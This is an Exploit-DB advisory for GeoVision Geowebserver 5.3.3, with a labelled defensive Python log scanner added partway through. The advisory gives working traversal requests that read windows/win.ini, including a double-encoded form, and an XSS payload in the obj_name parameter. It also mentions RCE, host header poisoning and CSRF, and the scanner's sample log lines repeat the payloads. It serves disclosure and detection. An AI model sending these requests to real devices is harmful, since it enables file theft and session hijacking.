GeoVision Geowebserver 5.3.3 – Local File Inclusion

Author: Ken Pyle
Date: 2021-08-17
Category:
Platform:
Source: https://www.exploit-db.com/exploits/50211/

# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php

GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client-side exploitation, including session theft:

Nested exploitation of the LFI, XSS, HTML / Browser Injection:

GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1

Absolute exploitation of the LFI:

POST /Visitor/bin/WebStrings.srf?obj_name=win.ini

GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
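Added defender-side example, not part of the advisory: a small log check that percent-decodes request targets until they stop changing, so both the single-encoded `file=..%2f` form and the double-encoded `%252e%252e%252f` form under /Visitor/ are caught, and that flags HTML tags injected through the query string. The log lines are constructed for the example; the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the advisory); the
# request targets mirror the two traversal forms and the obj_name injection.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2021:10:00:01 +0000] "GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script> HTTP/1.1" 200 512
10.0.0.6 - - [17/Aug/2021:10:00:02 +0000] "GET /Visitor//%252e%252e%252f%252e%252e%252fwindows\\win.ini HTTP/1.1" 200 220
10.0.0.7 - - [17/Aug/2021:10:00:03 +0000] "GET /Visitor/bin/WebStrings.srf?file=strings.xml&obj_name=Login HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
TRAVERSAL_RE = re.compile(r'\.\./')
TAG_RE = re.compile(r'<\s*/?\s*[a-z][a-z0-9]*', re.I)


def fully_decode(s, max_rounds=5):
    """Percent-decode until stable, so %252e%252e%252f unfolds to ../ ."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target):
    """Return the list of findings for one request target (empty if clean)."""
    findings = []
    decoded = fully_decode(target)
    # The host is Windows: treat backslash and forward slash alike.
    norm = decoded.replace("\\", "/")
    if norm.lower().startswith("/visitor/") and TRAVERSAL_RE.search(norm):
        findings.append("lfi-traversal")
    if decoded != unquote(target):  # a second decode round changed it
        findings.append("double-encoding")
    if TAG_RE.search(decoded):
        findings.append("html-injection")
    return findings


def scan_log(text):
    """Yield (client_ip, findings) for every flagged line in a log excerpt."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify(m.group("target"))
        if findings:
            hits.append((line.split()[0], findings))
    return hits
```

A plain single-decode filter would miss the second line, since `%252e` only becomes `.` after two rounds.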
    
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.

ex. obj_name=INJECTEDHTML / XSS

The application fails to properly enforce permissions and sanitize user requests. This allows for LFI / Remote Code Execution through several vectors:

ex. /Visitor//%252e(path to target)

These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:

The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.

These attacks were disclosed as part of the IOTVillage Presentation: